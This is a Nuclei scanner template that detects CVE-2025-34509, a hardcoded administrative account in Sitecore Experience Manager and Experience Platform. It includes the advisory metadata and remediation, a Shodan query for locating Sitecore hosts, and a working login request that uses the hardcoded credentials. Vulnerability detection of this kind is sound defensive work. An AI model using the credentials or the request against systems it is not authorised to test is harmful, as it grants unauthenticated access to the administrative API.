id: CVE-2025-34509

info:
  name: Sitecore Experience Manager (XM) and Experience Platform (XP) - Hardcoded Credentials
  author: daffainfo
  severity: high
  description: |
    Sitecore Experience Manager (XM) and Experience Platform (XP) versions 10.1 to 10.1.4 rev. 011974 PRE, all versions of 10.2, 10.3 to 10.3.3 rev. 011967 PRE, and 10.4 to 10.4.1 rev. 011941 PRE contain a hardcoded user account. Unauthenticated remote attackers can use this account to access the administrative API over HTTP.
  impact: |
    Unauthenticated attackers can use the hardcoded credentials to access administrative API endpoints over HTTP, potentially compromising the entire Sitecore platform.
  remediation: |
    Apply the security patch described in Sitecore KB1003667 and change all default credentials immediately.
  reference:
    - https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform/
    - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34509
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2025-34509
    epss-score: 0.16874
    epss-percentile: 0.95123
    cwe-id: CWE-798
    cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:*,cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sitecore
    product: experience_commerce,experience_platform
    shodan-query: title:"sitecore"
  tags: cve,cve2025,sitecore,experience_commerce,experience_platform,vkev

http:
  - raw:
      - |
        POST /sitecore/api/ssc/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"domain":"sitecore","username":"{{username}}","password":"{{password}}"}

    attack: pitchfork
    payloads:
      username:
        - ServicesAPI
      password:
        - b

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Set-Cookie'
          - '.AspNet.Cookies='
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c46e6f4d7e2e5aba7ef847b1f06030ae33de44db514d751a437a66be438c194c02200d6033078ec40459357d6065bfd3ec0c66a4255dd8062227b4af964bb912ae6a:922c64590222798bb761d5b6d8e72950